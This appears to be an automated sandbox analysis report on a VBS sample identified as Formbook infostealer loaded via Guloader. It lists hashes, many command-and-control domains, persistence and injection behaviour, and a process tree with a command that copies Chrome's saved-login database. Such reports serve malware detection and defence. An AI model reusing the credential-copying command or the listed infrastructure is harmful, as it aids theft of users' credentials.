Analysis
-
max time kernel: 148s
-
max time network: 141s
-
platform: windows10-2004_x64
-
resource: win10v2004-en-20220113
-
submitted: 09-02-2022 14:58
Static task: static1
Behavioral task: behavioral1
  Sample: file673736 241-22 01.02.22.vbs
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: file673736 241-22 01.02.22.vbs
  Resource: win10v2004-en-20220113
General
-
Target: file673736 241-22 01.02.22.vbs
-
Size: 165KB
-
MD5: 7faf86b2e1bb45a26367227c777dc668
-
SHA1: 74e41c42eb5b04c532567d9244c969f4895ee3ca
-
SHA256: e76b1a4f9aa3787900758ce81367f40587ca3d6a3a7ab6d1d02537e12cb10c37
-
SHA512: c9427897cb391da11ee8325cd0ffd8efc7b94b2c46503a1cc4a71bd8497fcdfa42efccba7613b1119329d26b510486fe1c05290726ce06c53b60b1c76ded6427
Malware Config
Extracted
Family: formbook
Version: 4.1
Campaign: k6sm
C2:
mingshengjewelry.com
ontimecleaningenterprise.com
alyssa0.xyz
ptecex.xyz
dukfot.online
pvcpc.com
iowalawtechnology.com
nestletranspotation.com
mysithomes.com
greenlakespaseattle.com
evofishingsystems.com
unilytcs.com
ordemt.com
dentalbatonrouge.com
pictureme360.net
chalinaslacatalana.com
newmirrorimage.xyz
pinklaceandlemonade.com
rapinantes.com
yzicpa.com
josephosman.com
robsarra.com
shumgroup.net
flooringnewhampshire.com
onceadayman.com
audiomacklaunch.xyz
hurryburry.com
golfvid.info
tutortenbobemail.com
tatlitelasorganizasyon.com
tqgtdd.space
classicalruns.com
xx3tgnf.xyz
galwayartanddesign.com
qidu.press
crypto-obmennik.com
dn360rn001.com
tridim.tech
phamhome.com
mediadollskill.com
loveatmetaverse.com
electric4x4parts.com
azulymargarita.com
isadoramel.com
rubyclean.com
officiallydanellewright.com
wu8d349s67op.xyz
detetivepyther.com
wondubniumgy463.xyz
registry-finance3.com
ultracoding.com
open-4business.com
supremelt.online
pangfeng.xyz
morneview.com
northfloridapsychic.com
kg4bppuh.xyz
friv.asia
epsilonhomecare.com
hbina.com
beachhutprinting.com
sophoscloudoptix.net
managemarksol.site
palestyna24.info
usyeslogistics.com
Signatures
-
Guloader, Cloudeye
A shellcode based downloader first seen in 2020.
-
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4648-159-0x0000000000400000-0x00000000006A3000-memory.dmp | formbook
behavioral2/memory/4648-160-0x0000000000400000-0x000000000042F000-memory.dmp | formbook
behavioral2/memory/4452-166-0x0000000000EC0000-0x0000000000EEF000-memory.dmp | formbook
-
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | colorcpl.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VFSHNFNPIRY = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe" | colorcpl.exe
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes: powershell.exe, ieinstal.exe
description | ioc | process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | ieinstal.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | colorcpl.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes: ieinstal.exe
pid | process
4648 | ieinstal.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, ieinstal.exe
pid | process
4248 | powershell.exe
4648 | ieinstal.exe
-
Suspicious use of SetThreadContext 3 IoCs
Processes: powershell.exe, ieinstal.exe, colorcpl.exe
description | pid | process | target process
PID 4248 set thread context of 4648 | 4248 | powershell.exe | ieinstal.exe
PID 4648 set thread context of 3024 | 4648 | ieinstal.exe | Explorer.EXE
PID 4452 set thread context of 3024 | 4452 | colorcpl.exe | Explorer.EXE
-
Drops file in Windows directory 8 IoCs
Processes: svchost.exe, TiWorker.exe
description | ioc | process
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | svchost.exe
File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe
File opened for modification | C:\Windows\WinSxS\pending.xml | TiWorker.exe
File opened for modification | C:\Windows\WindowsUpdate.log | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | svchost.exe
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | svchost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 IoCs
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | colorcpl.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes: powershell.exe, ieinstal.exe, colorcpl.exe
pid | process
4248 | powershell.exe
4248 | powershell.exe
4648 | ieinstal.exe
4648 | ieinstal.exe
4648 | ieinstal.exe
4648 | ieinstal.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
-
Suspicious behavior: MapViewOfSection 9 IoCs
Processes: powershell.exe, ieinstal.exe, colorcpl.exe
pid | process
4248 | powershell.exe
4248 | powershell.exe
4648 | ieinstal.exe
4648 | ieinstal.exe
4648 | ieinstal.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
4452 | colorcpl.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, svchost.exe, TiWorker.exe
description | pid | process
Token: SeDebugPrivilege | 4248 | powershell.exe
Token: SeShutdownPrivilege | 2272 | svchost.exe
Token: SeCreatePagefilePrivilege | 2272 | svchost.exe
Token: SeShutdownPrivilege | 2272 | svchost.exe
Token: SeCreatePagefilePrivilege | 2272 | svchost.exe
Token: SeShutdownPrivilege | 2272 | svchost.exe
Token: SeCreatePagefilePrivilege | 2272 | svchost.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
Token: SeBackupPrivilege | 1280 | TiWorker.exe
Token: SeRestorePrivilege | 1280 | TiWorker.exe
Token: SeSecurityPrivilege | 1280 | TiWorker.exe
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes: WScript.exe, powershell.exe, csc.exe, Explorer.EXE, colorcpl.exe
description | pid | process | target process
PID 4088 wrote to memory of 4248 | 4088 | WScript.exe | powershell.exe
PID 4088 wrote to memory of 4248 | 4088 | WScript.exe | powershell.exe
PID 4088 wrote to memory of 4248 | 4088 | WScript.exe | powershell.exe
PID 4248 wrote to memory of 3460 | 4248 | powershell.exe | csc.exe
PID 4248 wrote to memory of 3460 | 4248 | powershell.exe | csc.exe
PID 4248 wrote to memory of 3460 | 4248 | powershell.exe | csc.exe
PID 3460 wrote to memory of 504 | 3460 | csc.exe | cvtres.exe
PID 3460 wrote to memory of 504 | 3460 | csc.exe | cvtres.exe
PID 3460 wrote to memory of 504 | 3460 | csc.exe | cvtres.exe
PID 4248 wrote to memory of 1300 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 1300 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 1300 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 4648 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 4648 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 4648 | 4248 | powershell.exe | ieinstal.exe
PID 4248 wrote to memory of 4648 | 4248 | powershell.exe | ieinstal.exe
PID 3024 wrote to memory of 4452 | 3024 | Explorer.EXE | colorcpl.exe
PID 3024 wrote to memory of 4452 | 3024 | Explorer.EXE | colorcpl.exe
PID 3024 wrote to memory of 4452 | 3024 | Explorer.EXE | colorcpl.exe
PID 4452 wrote to memory of 1988 | 4452 | colorcpl.exe | cmd.exe
PID 4452 wrote to memory of 1988 | 4452 | colorcpl.exe | cmd.exe
PID 4452 wrote to memory of 1988 | 4452 | colorcpl.exe | cmd.exe
PID 4452 wrote to memory of 4512 | 4452 | colorcpl.exe | Firefox.exe
PID 4452 wrote to memory of 4512 | 4452 | colorcpl.exe | Firefox.exe
PID 4452 wrote to memory of 4512 | 4452 | colorcpl.exe | Firefox.exe
Processes
-
1⤵ C:\Windows\System32\WScript.exe
   command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file673736 241-22 01.02.22.vbs"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   -
   2⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Checks QEMU agent file
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      -
      3⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
         command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.cmdline"
         - Suspicious use of WriteProcessMemory
         -
         4⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE01C.tmp" "c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMP"
      -
      3⤵ C:\Program Files (x86)\internet explorer\ieinstal.exe
         command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      -
      3⤵ C:\Program Files (x86)\internet explorer\ieinstal.exe
         command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
         - Checks QEMU agent file
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious use of SetThreadContext
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious behavior: MapViewOfSection
-
1⤵ C:\Windows\Explorer.EXE
   command line: C:\Windows\Explorer.EXE
   - Suspicious use of WriteProcessMemory
   -
   2⤵ C:\Windows\SysWOW64\colorcpl.exe
      command line: "C:\Windows\SysWOW64\colorcpl.exe"
      - Adds policy Run key to start application
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
      -
      3⤵ C:\Windows\SysWOW64\cmd.exe
         command line: /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
      -
      3⤵ C:\Program Files\Mozilla Firefox\Firefox.exe
         command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
-
1⤵ C:\Windows\system32\svchost.exe
   command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
   - Drops file in Windows directory
   - Suspicious use of AdjustPrivilegeToken
-
1⤵ C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
   command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
   - Drops file in Windows directory
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Aktivsgem.dat
MD5: b8fb4faef24302dcfac6cc1a885b1ec2
SHA1: 9c14c95107f054c0bfc77243cb99aa57fe3f9bd1
SHA256: 9ba5694976d1254b451bc1be9495049fba0421e65d1ccf23fb2c39a2d4f531f0
SHA512: e0506ecdb5fcfcb32e0f32167c30a7daa03e572eb514db96661709751c161f85f265a6f98ce2c2e03aa2cf1a80dbcba489614e7923aa2f7e7fc629b068ef41d7
-
C:\Users\Admin\AppData\Local\Temp\DB1
MD5: b608d407fc15adea97c26936bc6f03f6
SHA1: 953e7420801c76393902c0d6bb56148947e41571
SHA256: b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf
SHA512: cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4
-
C:\Users\Admin\AppData\Local\Temp\RESE01C.tmp
MD5: a3ecd28106cca394cba7579fc9e84b57
SHA1: 2c9c5708b24b828e76185dacb549b5f0c4d41efd
SHA256: da5ff9f640f9485e28acf160f4d1d849037b1546a3ae4be31799893d21a01a7f
SHA512: 79dd9860fda9e92306d83d9a2d9dd56b41f1cb6fa75e080b5409025a41c87c5a6199e7cf3ed029dc03d63448453aa2ef2c6059af29fa5cfcd833171e04262cf7
-
C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.dll
MD5: 71cd14449e53eb22c5c76e6aa7ade0b6
SHA1: ecfbd9f40a06334aa79b7bf8c67cd0647910967c
SHA256: ace9ff29f24190093742234c8871955bee2864b39729ed0b7d3dc397567d7f89
SHA512: 00a471d42c9c7675f0a140ef12486525d2ac161724151ac39db80709eab37c35de69aedd67a673d49cf05421260b3f596891c67e0256520dff4df85a86676c30
-
\??\c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMP
MD5: 2e53da9eedde3a261a6e07d633598a3e
SHA1: 8cffb57d8682c5e605e795950c54b4906b46d6f4
SHA256: c637c0a28a7c456ce36dcc526ff1c9cf9aac1ba0f7d8983bcce13d5002ca4631
SHA512: 3619e4521ff09860b045410dffd144aad43cccc15c532d9b675114db0a7c4e6e22fab744899ed46f430367f9c484b25460d73875cc106afc564afca7bd243383
-
\??\c:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.0.cs
MD5: 697049d413cadd67ef091f8c308f0482
SHA1: 0510cd1e3afcb6f0bd7b8ed42fc69aca5a81f2eb
SHA256: 461e5bf63d4baf8fde83b3e06708456c781bdae2c8b264f0c5309e719f24d4b2
SHA512: d1da3776083b4f116e11a82534bf5e31949b81d3c448d2d188d80fa357c24ca157c92ef1d9a2a714a1c131100b6c85ad3b492c50af696af10e01cc7ee4e41fde
-
\??\c:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.cmdline
MD5: c9dec58b3fbf19e9ad5ceff7e257eb81
SHA1: 12e995fa33cd962ba551eecb0e7a6c845bcb0a60
SHA256: 72443a1d862c2724f2be2b7a08055d2df8e52bf563011fe27d1e6e5491e9fd66
SHA512: c466c13e8fb91e01305a2b68ca97c1a0a109855b22c75eea2097357645741a213c5002e4d6e73a673297edbd86382902a99bcedd1d05eeb043c4d85bf0b65627
-
memory/2272-154-0x0000017754B20000-0x0000017754B24000-memory.dmp  Filesize: 16KB
-
memory/2272-152-0x0000017752420000-0x0000017752430000-memory.dmp  Filesize: 64KB
-
memory/2272-151-0x0000017751DA0000-0x0000017751DB0000-memory.dmp  Filesize: 64KB
-
memory/3024-170-0x0000000008C90000-0x0000000008D8E000-memory.dmp  Filesize: 1016KB
-
memory/3024-164-0x00000000090C0000-0x00000000091C5000-memory.dmp  Filesize: 1.0MB
-
memory/4248-140-0x0000000007F30000-0x00000000085AA000-memory.dmp  Filesize: 6.5MB
-
memory/4248-133-0x0000000005772000-0x0000000005773000-memory.dmp  Filesize: 4KB
-
memory/4248-130-0x00000000752DE000-0x00000000752DF000-memory.dmp  Filesize: 4KB
-
memory/4248-139-0x0000000005775000-0x0000000005777000-memory.dmp  Filesize: 8KB
-
memory/4248-138-0x00000000067F0000-0x000000000680E000-memory.dmp  Filesize: 120KB
-
memory/4248-147-0x0000000007950000-0x00000000079E6000-memory.dmp  Filesize: 600KB
-
memory/4248-148-0x0000000007850000-0x0000000007872000-memory.dmp  Filesize: 136KB
-
memory/4248-149-0x0000000008B60000-0x0000000009104000-memory.dmp  Filesize: 5.6MB
-
memory/4248-137-0x00000000059E0000-0x0000000005A46000-memory.dmp  Filesize: 408KB
-
memory/4248-136-0x0000000005970000-0x00000000059D6000-memory.dmp  Filesize: 408KB
-
memory/4248-135-0x0000000005720000-0x0000000005742000-memory.dmp  Filesize: 136KB
-
memory/4248-153-0x00000000079F0000-0x0000000007AF0000-memory.dmp  Filesize: 1024KB
-
memory/4248-134-0x0000000005DB0000-0x00000000063D8000-memory.dmp  Filesize: 6.2MB
-
memory/4248-155-0x00007FFCA93B1000-0x00007FFCA94CA000-memory.dmp  Filesize: 1.1MB
-
memory/4248-156-0x0000000077CF1000-0x0000000077E11000-memory.dmp  Filesize: 1.1MB
-
memory/4248-131-0x0000000002EB0000-0x0000000002EE6000-memory.dmp  Filesize: 216KB
-
memory/4248-132-0x0000000005770000-0x0000000005771000-memory.dmp  Filesize: 4KB
-
memory/4248-141-0x0000000006D90000-0x0000000006DAA000-memory.dmp  Filesize: 104KB
-
memory/4452-165-0x0000000000560000-0x0000000000579000-memory.dmp  Filesize: 100KB
-
memory/4452-166-0x0000000000EC0000-0x0000000000EEF000-memory.dmp  Filesize: 188KB
-
memory/4452-167-0x0000000002ED0000-0x000000000321A000-memory.dmp  Filesize: 3.3MB
-
memory/4452-169-0x0000000002D00000-0x0000000002D94000-memory.dmp  Filesize: 592KB
-
memory/4648-160-0x0000000000400000-0x000000000042F000-memory.dmp  Filesize: 188KB
-
memory/4648-161-0x000000001CE80000-0x000000001D1CA000-memory.dmp  Filesize: 3.3MB
-
memory/4648-163-0x000000001CC30000-0x000000001CC45000-memory.dmp  Filesize: 84KB
-
memory/4648-162-0x000000000041F000-0x0000000000420000-memory.dmp  Filesize: 4KB
-
memory/4648-159-0x0000000000400000-0x00000000006A3000-memory.dmp  Filesize: 2.6MB
-
memory/4648-158-0x0000000001000000-0x0000000001100000-memory.dmp  Filesize: 1024KB
-
memory/4648-157-0x0000000001000000-0x0000000001100000-memory.dmp  Filesize: 1024KB